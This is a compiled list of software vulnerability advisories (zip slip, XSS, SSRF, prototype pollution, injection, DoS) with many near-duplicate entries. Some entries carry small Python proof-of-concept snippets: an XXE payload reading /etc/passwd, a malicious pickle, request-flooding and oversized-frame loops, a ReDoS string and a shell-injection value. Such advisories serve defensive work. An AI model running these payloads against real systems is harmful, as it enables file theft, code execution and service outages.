All versions of archiver allow attacker to perform a Zip Slip attack via the "unarchive" functions. It is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a "../../file.exe" location …
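To illustrate the path arithmetic described above (a language-agnostic sketch written here in Python; the directory and file names are hypothetical and this is not the archiver library's own code):

    import os

    target_dir = "/tmp/extract"
    entry_name = "../../file.exe"            # attacker-controlled name stored in the archive
    final_path = os.path.join(target_dir, entry_name)
    print(os.path.normpath(final_path))      # /file.exe -- outside the target folder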
In all versions of the package github.com/unknwon/cae/tz, the ExtractTo function doesn't securely escape file paths in zip archives which include leading or non-leading "..". This allows an attacker to add or replace files system-wide.
In all versions of the package github.com/unknwon/cae/tz, the ExtractTo function does not securely escape file paths in zip archives which include leading or non-leading "..". This allows an attacker to add or replace files system-wide.
Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an (1) image or (2) build in a Dockerfile.
A path traversal flaw was found in Buildah in versions before 1.14.5. This flaw allows an attacker to trick a user into building a malicious container image hosted on an HTTP(s) server and then write files to the user's system anywhere that the user has permissions.
In all versions of the package github.com/unknwon/cae/zip, the ExtractTo function does not securely escape file paths in zip archives which include leading or non-leading "..". This allows an attacker to add or replace files system-wide.
In all versions of the package github.com/unknwon/cae/zip, the ExtractTo function doesn't securely escape file paths in zip archives which include leading or non-leading "..". This allows an attacker to add or replace files system-wide.
This affects all versions of package github.com/u-root/u-root/pkg/uzip. It is vulnerable to both leading and non-leading relative path traversal attacks in zip file extraction.
Cloud Foundry Routing, all versions before 0.193.0, does not properly validate nonce input. A remote unauthenticated malicious user could forge an HTTP route service request using an invalid nonce that will cause the Gorouter to crash.
In Go Ethereum (aka geth) before 1.8.14, TraceChain in eth/api_tracer.go does not verify that the end block is after the start block.
HashiCorp Consul and Consul Enterprise does not appropriately enforce scope for local tokens issued by a primary data center, where replication to a secondary data center was not enabled. Introduced in 1.4.0, fixed in 1.6.6 and 1.7.4.
jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m["aud"] (which is allowed by the specification). Because the type assertion fails, "" is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check.
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions prior to 12.6.7 and 12.10.3, a user without Script or Programming right is able to execute script requiring privileges by editing gadget titles in the dashboard. The issue has been patched in XWiki 12.6.7, 12.10.3 and 13.0RC1.
HashiCorp Nomad and Nomad Enterprise up to 0.10.2 incorrectly validated role/region associated with TLS certificates used for mTLS RPC, and were susceptible to privilege escalation. Fixed in 0.10.3.
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions prior to 11.10.13, 12.6.7, and 12.10.2, a user disabled on a wiki using email verification for registration could re-activate themselves by using the activation link provided for their registration. The problem has been patched in the following versions of XWiki: 11.10.13, 12.6.7, 12.10.2, 13.0. It is possible to work around the issue by …
InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
Improper authentication is possible in Apache Traffic Control versions 3.0.0 and 3.0.1 if LDAP is enabled for login in the Traffic Ops API component. Given a username for a user that can be authenticated via LDAP, it is possible to improperly authenticate as that user without that user's correct password.
Lightning Network Daemon (lnd) before 0.7 allows attackers to trigger loss of funds because of Incorrect Access Control.
go-jose before 1.0.4 suffers from multiple signatures exploitation. The go-jose library supports messages with multiple signatures. However, when validating a signed message the API did not indicate which signature was valid, which could potentially lead to confusion. For example, users of the library might mistakenly read protected header values from an attached signature that was different from the one originally validated.
** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2019-10223. Reason: This candidate is a duplicate of CVE-2019-10223. Notes: All CVE users should reference CVE-2019-10223 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.
When using the Azure backend with a shared access signature (SAS), Terraform versions prior to 0.12.17 may transmit the token and state snapshot using cleartext HTTP.
HashiCorp Nomad and Nomad Enterprise up to 0.10.2 HTTP/RPC services allowed unbounded resource usage, and were susceptible to unauthenticated denial of service. Fixed in 0.10.3.
HashiCorp Consul and Consul Enterprise include an HTTP API (introduced in 1.2.0) and DNS (introduced in 1.4.3) caching feature that was vulnerable to denial of service. Fixed in 1.6.6 and 1.7.4.
HashiCorp Consul and Consul Enterprise up to 1.6.2 HTTP/RPC services allowed unbounded resource usage, and were susceptible to unauthenticated denial of service. Fixed in 1.6.3.
Description: The ability to enumerate users was possible without relevant permissions due to different exception messages depending on whether the user existed or not. It was also possible to enumerate users by using a timing attack, by comparing the time elapsed when authenticating an existing user and authenticating a non-existing user. Resolution: We now ensure that 403s are returned whether the user exists or not if the password is invalid or …
The ability to enumerate users was possible without relevant permissions due to different exception messages depending on whether the user existed or not.
The package koa-remove-trailing-slashes is vulnerable to Open Redirect via the use of trailing double slashes in the URL when accessing the vulnerable endpoint (such as https://example.com//attacker.example/). The vulnerable code is in index.js::removeTrailingSlashes(), as the web server uses relative URLs instead of absolute URLs.
Matrix-React-SDK is a React-based SDK for inserting a Matrix chat/VoIP client into a web page. When uploading a file, the local file preview can lead to execution of scripts embedded in the uploaded file. This can only occur after several user interactions to open the preview in a separate tab. This only impacts the local user while in the process of uploading. It cannot be exploited remotely or by other …
fastify-csrf is an open-source plugin that helps developers protect their Fastify server against CSRF attacks. Affected versions of fastify-csrf have a "double submit" mechanism using cookies with an application deployed across multiple subdomains, e.g. "heroku"-style platform as a service. A later release of fastify-csrf fixes the vulnerability. The user of the module would need to supply a userInfo when generating the CSRF token to fully implement the protection on their end. This is …
Flask-Security allows redirects after many successful views (e.g. /login) by honoring the ?next query param. There is code in FS to validate that the URL specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Python's urlsplit library. However, many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented …
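A hedged illustration of the kind of URL this describes, using Python's urlsplit; the host evil.example and the exact check are hypothetical, not Flask-Security's actual code:

    from urllib.parse import urlsplit

    # urlsplit reports an empty netloc for this value, so a relative-URL/same-netloc check
    # passes, yet browsers that treat "\" as "/" will navigate to evil.example instead of
    # a local path.
    next_url = "/\\evil.example"
    print(urlsplit(next_url).netloc)   # '' -- looks relative to the server-side check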
Access bypass vulnerability in the Drupal Core Workspaces module allows an attacker to access data without correct permissions. The Workspaces module does not sufficiently check access permissions when switching workspaces, leading to an access bypass vulnerability. An attacker might be able to see content before the site owner intends people to see the content.
Access bypass vulnerability in the Drupal Core Workspaces module allows an attacker to access data without correct permissions. The Workspaces module does not sufficiently check access permissions when switching workspaces, leading to an access bypass vulnerability. An attacker might be able to see content before the site owner intends people to see the content. This vulnerability is mitigated by the fact that sites are only vulnerable if they have installed the …
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in nokogiri.
A cross-site scripting vulnerability exists in koa-shopify-auth v3.1.61-v3.1.62 that allows an attacker to inject JS payloads into the shop parameter on the /shopify/auth/enable_cookies endpoint.
An issue was discovered in server.js in TileServer GL. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS.
When taxes are enabled, the Additional tax classes field was not properly sanitised or escaped before being output back in the admin dashboard, allowing high-privilege users such as admin to use XSS payloads even when the unfiltered_html setting is disabled.
vmd allows div class="markdown-body" XSS, as demonstrated by Electron remote code execution via require('child_process').execSync('calc.exe') on Windows and a similar attack on macOS.
A prototype pollution vulnerability allows an attacker to cause a denial of service and may also lead to remote code execution.
Prototype pollution vulnerability in deep-override allows an attacker to cause a denial of service and may also lead to remote code execution.
A vulnerability found in libxml2 shows that it does not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application. The highest threat from this vulnerability is to system availability.
Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e. file.extension) can be included; files that lack an extension will have .handlebars appended to them. For complete details refer to the …
express-hbs is an Express handlebars template engine. express-hbs mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e. file.extension) can be included; files that lack an extension will have .hbs appended to them.
haml-coffee is a JavaScript templating solution. haml-coffee mixes pure template data with engine configuration options through the Express render API. More specifically, haml-coffee supports overriding a series of HTML helper functions through its configuration options. A vulnerable application that passes user controlled request objects to the haml-coffee template engine may introduce RCE vulnerabilities. Additionally control over the escapeHtml parameter through template configuration pollution ensures that haml-coffee would not sanitize template …
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE.
Impact: Passing either 'infinity', 'inf' or float('inf') (or their negatives) to datetime or date fields causes validation to run forever with 100% CPU usage (on one CPU). Patches: Pydantic has been patched, with fixes available in the following versions: v1.8.2, v1.7.4 and v1.6.2. All these versions are available on PyPI, and will be available on conda-forge soon. See the changelog for details. Workarounds: If you absolutely can't upgrade, you can work …
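A minimal sketch of the problematic inputs, assuming an unpatched pydantic install; the Event model is hypothetical and the triggering calls are left commented out because they would hang:

    from datetime import datetime
    from pydantic import BaseModel

    class Event(BaseModel):   # hypothetical model, for illustration only
        when: datetime

    # On vulnerable versions, each of these spins forever at 100% CPU:
    # Event(when='infinity')
    # Event(when='inf')
    # Event(when=float('inf'))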
A possible use-after-free and double-free exists in the c-ares library if ares_destroy() is called prior to ares_getaddrinfo() completing. This flaw possibly allows an attacker to crash the service that uses the c-ares library. The highest threat from this vulnerability is to the availability of that service.
GraphHopper is an open-source Java routing engine. In GraphHopper, there is a regular expression injection vulnerability that may lead to Denial of Service.
GraphHopper is an open-source Java routing engine. In affected versions of GraphHopper, there is a regular expression injection vulnerability that may lead to Denial of Service.
The OpenID Connect server implementation for MITREid Connect through 1.3.3 contains a Server Side Request Forgery (SSRF) vulnerability. The vulnerability arises due to unsafe usage of the logo_uri parameter in the Dynamic Client Registration request. An unauthenticated attacker can make an HTTP request from the vulnerable server to any address in the internal network and obtain its response (which might, for example, have a JavaScript payload for resultant XSS). The …
CXF supports (via JwtRequestCodeFilter) passing OAuth 2 parameters via a JWT token as opposed to query parameters (see: The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request (JAR)). Instead of sending a JWT token as a "request" parameter, the spec also supports specifying a URI from which to retrieve a JWT token via the "request_uri" parameter. CXF was not validating the "request_uri" parameter (apart from ensuring it uses "https") …
A flaw was found in OpenJPEG’s encoder. This flaw allows an attacker to pass specially crafted x,y offset input to OpenJPEG to use during encoding. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
A flaw was found in OpenJPEG’s encoder in the opj_dwt_calc_explicit_stepsizes() function. This flaw allows an attacker who can supply crafted input to decomposition levels to cause a buffer overflow. The highest threat from this vulnerability is to system availability.
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that error codes are returned whether the user exists or not if a user cannot switch to a user or …
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that status codes are returned whether the user exists or not if a user cannot switch to a user or …
A flaw was found in wildfly. The JBoss EJB client has publicly accessible privileged actions which may lead to information disclosure on the server it is deployed on. The highest threat from this vulnerability is to data confidentiality.
The Flask-Caching extension for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation. If an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.), they can construct a crafted payload, poison the cache, and execute Python code.
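A generic illustration of why attacker-controlled pickle data is dangerous (this shows only the pickle mechanism, not Flask-Caching's actual storage format; the Payload class is hypothetical):

    import pickle

    class Payload:
        # pickle calls the callable returned by __reduce__ while deserializing, so any
        # attacker-controlled bytes read back from the cache can execute arbitrary code.
        def __reduce__(self):
            return (print, ("code executed during unpickling",))

    poisoned_entry = pickle.dumps(Payload())   # what an attacker would plant in the cache store
    pickle.loads(poisoned_entry)               # prints the message; a real payload could do anything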
ACS Commons version 4.9.2 (and earlier) suffers from a Reflected Cross-site Scripting (XSS) vulnerability in version-compare and page-compare due to invalid JCR characters that are not handled correctly. An attacker could potentially exploit this vulnerability to inject malicious JavaScript content into vulnerable form fields and execute it within the context of the victim's browser. Exploitation of this issue requires user interaction in order to be successful.
Livy server version 0.7.0-incubating (only) is vulnerable to a cross site scripting issue in the session name. A malicious user could use this flaw to access logs and results of other users' sessions and run jobs with their privileges. This issue is fixed in Livy 0.7.1-incubating.
This advisory has been marked as a False Positive and has been removed.
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that s are returned whether the user exists or not if a user cannot switch to a user or if …
"Push rules" can specify conditions under which they will match, including event_match, which matches event content against a pattern including wildcards. Certain patterns can cause very poor performance in the matching engine, leading to a denial-of-service when processing moderate length events.
Kubernetes version 1.5.0-1.5.4 is vulnerable to a privilege escalation in the PodSecurityPolicy admission plugin resulting in the ability to make use of any existing PodSecurityPolicy object.
A flaw was found in keycloak. Directories can be created prior to the Java process creating them in the temporary directory, but with wider user permissions, allowing the attacker to have access to the contents that keycloak stores in this directory. The highest threat from this vulnerability is to data confidentiality and integrity.
Puma is a concurrent HTTP server for Ruby/Rack applications. The fix for CVE-2019-16770 was incomplete. The original fix only protected existing connections that had already been accepted from having their requests starved by greedy persistent-connections saturating all threads in the same process. However, new connections may still be starved by greedy persistent-connections saturating all threads in all processes in the cluster. A puma server which received more concurrent keep-alive connections …
Jenkins S3 publisher Plugin does not perform Run/Artifacts permission checks in various HTTP endpoints and API models, allowing attackers with Item/Read permission to obtain information about artifacts uploaded to S3, if the optional Run/Artifacts permission is enabled.
Jenkins S3 publisher Plugin does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to obtain the list of configured profiles.
Jenkins P4 Plugin does not perform permission checks in multiple HTTP endpoints, allowing attackers with Overall/Read permission to connect to an attacker-specified Perforce server using attacker-specified username and password.
Openapi generator is a java tool which allows generation of API client libraries (SDK generation), server stubs, documentation and configuration automatically given an OpenAPI Spec. openapi-generator-online creates insecure temporary folders with File.createTempFile during the code generation process. The insecure temporary folders store the auto-generated files which can be read and appended to by any users on the system. The issue has been patched with Files.createTempFile and released in the v5.1.0 …
Due to how Wire handles type information in its serialization format, malicious payloads can be passed to a deserializer. e.g. using a surrogate on the sender end, an attacker can pass information about a different type for the receiving end. And by doing so allowing the serializer to create any type on the deserializing end. This is the same issue that exists for .NET BinaryFormatter https://docs.microsoft.com/en-us/visualstudio/code-quality/ca2300?view=vs-2019.
Jenkins Credentials Plugin does not escape user-controlled information on a view it provides, resulting in a reflected cross-site scripting (XSS) vulnerability.
(This issue is currently in DISPUTED state). The express-cart package for Node.js allows Reflected XSS (for an admin) via a user input field for product options. The vendor states that this "would rely on an admin hacking his/her own website."
A cross-site request forgery (CSRF) vulnerability in Jenkins P4 Plugin allows attackers to connect to an attacker-specified Perforce server using attacker-specified username and password.
JPA Server in HAPI FHIR allows a user to deny service (e.g., disable access to the database after the attack stops) via history requests. This occurs because of a SELECT COUNT statement that requires a full index scan, with an accompanying large amount of server resources if there are many simultaneous history requests.
The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This …
Spring Security 5.4.x to 5.4.3, 5.3.x to 5.3.8.RELEASE, 5.2.x to 5.2.8.RELEASE, and older unsupported versions can fail to save the SecurityContext if it is changed more than once in a single request. A malicious user cannot cause the bug to happen (it must be programmed in). However, if the application's intent is to only allow the user to run with elevated privileges in a small portion of the application, the bug …
A carefully crafted or corrupt file may trigger an infinite loop in Tika's MP3Parser up to and including Tika 1.25. Apache Tika users should upgrade to 1.26 or later.
Applications using the “Sensitive Headers” functionality in Spring Cloud Netflix Zuul 2.2.6.RELEASE and below may be vulnerable to bypassing the “Sensitive Headers” restriction when executing requests with specially constructed URLs. Applications that use Spring Security's StrictHttpFirewall (enabled by default for all URLs) are not affected by the vulnerability, as they reject requests that allow bypassing.
Broken Authentication in Atlassian Connect Spring Boot (ACSB) from version 1.1.0 before version 2.1.3: Atlassian Connect Spring Boot is a Java Spring Boot package for building Atlassian Connect apps. Authentication between Atlassian products and the Atlassian Connect Spring Boot app occurs with a server-to-server JWT or a context JWT. Atlassian Connect Spring Boot versions between 1.1.0 - 2.1.2 erroneously accept context JWTs in lifecycle endpoints (such as installation) where only …
When using ConfigurableInternodeAuthHadoopPlugin for authentication, Apache Solr versions prior to 8.8.2 would forward/proxy distributed requests using server credentials instead of original client credentials. This would result in incorrect authorization resolution on the receiving hosts.
This affects all versions before 10.1.14 and from 10.2.0 to 10.2.4 of package com.typesafe.akka:akka-http-core. It allows multiple Transfer-Encoding headers.
In Eclipse Theia versions up to and including, in the notification messages there is no HTML escaping, so Javascript code can run.
The package grpc and the package @grpc/grpc-js are vulnerable to Prototype Pollution via loadPackageDefinition.
The package grpc and the package @grpc/grpc-js are vulnerable to Prototype Pollution via loadPackageDefinition.
Openapi generator is a java tool which allows generation of API client libraries (SDK generation), server stubs, documentation and configuration automatically given an OpenAPI Spec. openapi-generator-online creates insecure temporary folders with File.createTempFile during the code generation process. The insecure temporary folders store the auto-generated files which can be read and appended to by any users on the system.
OpenAPI Generator allows generation of API client libraries (SDK generation), server stubs, documentation and configuration automatically given an OpenAPI Spec. Affected generators include okhttp-gson (default library) and scala-finch.
A deadlock vulnerability was found in 'github.com/containers/storage' in versions before 1.28.1. When a container image is processed, each layer is unpacked using tar. If one of those layers is not a valid tar archive this causes an error leading to an unexpected situation where the code indefinitely waits for the tar unpacked stream, which never finishes. An attacker could use this vulnerability to craft a malicious image, which when downloaded …
A deadlock vulnerability was found in 'github.com/containers/storage' in versions before 1.28.1. When a container image is processed, each layer is unpacked using tar. If one of those layers is not a valid tar archive this causes an error leading to an unexpected situation where the code indefinitely waits for the tar unpacked stream, which never finishes. An attacker could use this vulnerability to craft a malicious image, which when downloaded …
Cross-site scripting vulnerability in EC-CUBE allows a remote attacker to inject a specially crafted script into a specific input field of an EC web site created using EC-CUBE. As a result, it may lead to arbitrary script execution in the administrator's web browser.
SIF is an open source implementation of the Singularity Container Image Format. The siftool new command and func siftool.New() produce predictable UUID identifiers due to insecure randomness in the version of the github.com/satori/go.uuid module used as a dependency. A patch is available in version >= v1.2.3 of the module. Users are encouraged to upgrade.
The redirect module in Liferay Portal before 7.3.3 does not limit the number of URLs resulting in a 404 error that is recorded, which allows remote attackers to perform a denial of service attack by making repeated requests for pages that do not exist.
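A minimal sketch of the denial-of-service vector, assuming a hypothetical portal host: every request for a distinct nonexistent page adds another recorded 404 entry, and the redirect module does not cap how many are stored.

import uuid
import requests

base = "http://liferay.example.test"   # hypothetical portal host
for _ in range(10000):
    # Each distinct missing URL results in another stored 404 record.
    requests.get(f"{base}/web/guest/{uuid.uuid4()}", timeout=10)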
A carefully crafted or corrupt PSD file can cause excessive memory usage in Apache Tika's PSDParser in versions 1.0-1.23.
The Spinnaker template resolution functionality is vulnerable to Server-Side Request Forgery (SSRF), which allows an attacker to send requests on behalf of Spinnaker potentially leading to sensitive data disclosure.
A carefully crafted or corrupt PSD file can cause an infinite loop in Apache Tika's PSDParser in versions 1.0-1.23.
A carefully crafted or corrupt file may trigger a System.exit in Tika's OneNote Parser. Crafted or corrupted files can also cause out of memory errors and/or infinite loops in Tika's ICNSParser, MP3Parser, MP4Parser, SAS7BDATParser, OneNoteParser and ImageParser. Apache Tika users should upgrade to 1.24.1 or later. The vulnerabilities in the MP4Parser were partially fixed by upgrading the com.googlecode:isoparser:1.1.22 dependency to org.tallison:isoparser:1.9.41.2. For unrelated security reasons, we upgraded org.apache.cxf to 3.3.6 …
HashiCorp vault-action (aka Vault GitHub Action) allows attackers to obtain sensitive information from log files because a multi-line secret was not correctly registered with GitHub Actions for log masking.
vega-util allows manipulation of object prototype. The 'vega.mergeConfig' method within vega-util could be tricked into adding or modifying properties of the Object.prototype.
odata4j 0.7.0 allows ExecuteCountQueryCommand.java SQL injection. NOTE: this product is apparently discontinued.
odata4j 0.7.0 allows ExecuteJPQLQueryCommand.java SQL injection. NOTE: this product is apparently discontinued.
(This issue is in RESOLVED state.) Only when using H2/MySQL/TiDB as Apache SkyWalking storage is there a SQL injection vulnerability in the wildcard query cases.
odata4j 0.7.0 allows ExecuteCountQueryCommand.java SQL injection. NOTE: this product is apparently discontinued.
odata4j 0.7.0 allows ExecuteJPQLQueryCommand.java SQL injection. NOTE: this product is apparently discontinued.
bootstrap-select allows Cross-Site Scripting (XSS). It does not escape title values in OPTION elements. This may allow attackers to execute arbitrary JavaScript in a victim's browser.
An XSS issue was discovered in tooltip/tooltip.js in PrimeTek PrimeFaces. In a web application using PrimeFaces, an attacker can provide JavaScript code in an input field whose data is later used as a tooltip title without any input validation.
A websocket peer may exhaust memory on the Eventlet side by sending very large websocket frames. A malicious peer may also exhaust memory on the Eventlet side by sending highly compressed data frames.
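A minimal sketch of the oversized-frame vector, using the third-party websocket-client package against a hypothetical Eventlet-backed WebSocket endpoint; the frame size is illustrative.

import websocket  # pip install websocket-client

ws = websocket.create_connection("ws://eventlet-server.example.test/ws")
# A single very large (or highly compressible) frame forces the Eventlet side
# to buffer the entire payload in memory before handing it to the application.
ws.send("A" * (100 * 1024 * 1024))
ws.close()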
In Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.
bootstrap-select before 1.13.6 allows Cross-Site Scripting (XSS). It does not escape title values in OPTION elements. This may allow attackers to execute arbitrary JavaScript in a victim's browser.
Craft CMS has an XSS vulnerability.
In Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass.
In Strapi, the admin panel allows the changing of one's own password without entering the current password. An attacker who gains access to a valid session can use this to take over an account by changing the password.
Unsafe validation RegEx in EmailValidator allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses.
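An illustration of the ReDoS class of bug with a deliberately unsafe, made-up email pattern (not the library's actual regex): nested quantifiers cause exponential backtracking on an input that almost matches and then fails.

import re
import time

UNSAFE_EMAIL_RE = re.compile(r"^([a-zA-Z0-9]+\.?)+@example\.com$")  # illustrative only

payload = "a" * 28 + "!"   # nearly matches, then fails; time grows exponentially with length
start = time.time()
UNSAFE_EMAIL_RE.match(payload)
print(f"took {time.time() - start:.1f}s")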
Impact: The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. Patches: The vulnerability has been patched on the master branch and on the stable branch. The Docker image on docker.io has been patched. Workarounds: If upgrading is not possible, manually apply the changes of https://github.com/jhpyle/docassemble/commit/e3dbf6ce054b3c0310996f0657289f5eed0a73fe and restart the server (e.g., by pressing Save on the Configuration screen). Credit: The vulnerability was …
The svglib package through 0.9.3 for Python allows XXE attacks via an svg2rlg call.
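A minimal sketch of the XXE vector: an SVG whose DOCTYPE declares an external entity that the XML parser may resolve while svg2rlg processes the file; the file path in the entity is illustrative.

from svglib.svglib import svg2rlg

malicious_svg = """<?xml version="1.0"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <text x="10" y="20">&xxe;</text>
</svg>"""

with open("payload.svg", "w") as f:
    f.write(malicious_svg)

drawing = svg2rlg("payload.svg")  # entity resolution happens during parsing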
An SSRF issue in Open Distro for Elasticsearch (ODFE) allows an existing privileged user to enumerate listening services or interact with configured resources via HTTP requests exceeding the Alerting plugin's intended scope.
Bolt before 3.7.2 does not restrict filter options in a Request in the Twig context, and is therefore inconsistent with the "How to Harden Your PHP for Better Security" guidance.
Insecure temporary directory usage in frontend build functionality of com.vaadin:flow-server versions 2.0.9 through 2.5.2 (Vaadin 14.0.3 through Vaadin 14.5.2), 3.0 prior to 6.0 (Vaadin 15 prior to 19), and 6.0.0 through 6.0.5 (Vaadin 19.0.0 through 19.0.4) allows local users to inject malicious code into frontend resources during application rebuilds. https://vaadin.com/security/cve-2021-31411
Insecure temporary directory usage in frontend build functionality of com.vaadin:flow-server versions 2.0.9 through 2.5.2 (Vaadin 14.0.3 through Vaadin 14.5.2), 3.0 prior to 6.0 (Vaadin 15 prior to 19), and 6.0.0 through 6.0.5 (Vaadin 19.0.0 through 19.0.4) allows local users to inject malicious code into frontend resources during application rebuilds.
The "gitDiff" function in Wayfair git-parse has a command injection vulnerability. Clients of the git-parse library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.
An issue was discovered in Laravel before 6.18.35 and 7.x before 7.24.0. The $guarded property is mishandled in some situations involving requests with JSON column nesting expressions.
All versions of phpjs are vulnerable to Prototype Pollution via parse_str.
The package handlebars before 4.7.7 is vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.
The package handlebars before 4.7.7 is vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.
The package handlebars before 4.7.7 is vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.
The package handlebars before 4.7.7 is vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.
This affects the package json before 10.0.0. It is possible to inject arbitrary commands using the parseLookup function.
Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
Reflected Cross-Site Scripting vulnerability in Modules.php in RosarioSIS Student Information System < 6.5.1 allows remote attackers to execute arbitrary web script by embedding JavaScript or HTML tags in a GET request.
In Ruby on Windows, a remote attacker can submit a crafted path when a Web application handles a parameter with TmpDir.
Mixme is a library for recursive merging of Javascript objects. In Node.js mixme, an attacker can add or alter properties of an object via __proto__ through the mutate() and merge() functions. The polluted attribute will be directly assigned to every object in the program. This will put the availability of the program at risk causing a potential denial of service (DoS).
An issue was discovered in Flask-CORS (aka CORS Middleware for Flask) before 3.0.9. It allows ../ directory traversal to access private resources because resource matching does not ensure that pathnames are in a canonical format.
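A minimal sketch of the non-canonical path matching issue: CORS is intended to apply only to /api/*, but against an affected version a cross-origin request whose raw path is /api/../private can match the pattern while ultimately resolving to the private resource. Route names and the permissive origin policy are illustrative.

from flask import Flask
from flask_cors import CORS

app = Flask(__name__)
# Intent: only /api/* responses should carry permissive CORS headers.
CORS(app, resources={r"/api/*": {"origins": "*"}})

@app.route("/api/public")
def public():
    return "public data"

@app.route("/private")
def private():
    return "private data"

# Against Flask-CORS before 3.0.9, a request whose un-normalized path is
# /api/../private may be answered with Access-Control-Allow-Origin: * even
# though the resource actually served is /private.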
Multiple cross-site request forgery (CSRF) vulnerabilities in the Admin Console in Fork before 5.8.3 allow remote attackers to perform unauthorized actions as administrator: (1) mass-approving a user's comments, (2) restoring a deleted user, (3) installing or running modules, (4) resetting the analytics, (5) pinging the mailmotor API, (6) uploading files to the media library, and (7) exporting locale.
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
This affects the package Gerapy from 0 and before 0.9.3. The input being passed to Popen, via the project_configure endpoint, isn’t being sanitized.
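A generic illustration of the underlying flaw class rather than Gerapy's actual code: user-controlled text that reaches Popen with shell=True lets a ';' append an arbitrary command. The command being built here is hypothetical.

from subprocess import PIPE, Popen

user_supplied = "myproject; id"   # attacker-controlled value, passed through unsanitized
proc = Popen(f"deploy-tool {user_supplied}", shell=True, stdout=PIPE, stderr=PIPE)
out, err = proc.communicate()
print(out.decode(), err.decode())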
Open Redirect vulnerability in Drupal Core allows a user to be tricked into visiting a specially crafted link which would redirect them to an arbitrary external URL. This issue affects: Drupal Drupal Core 7 and prior versions.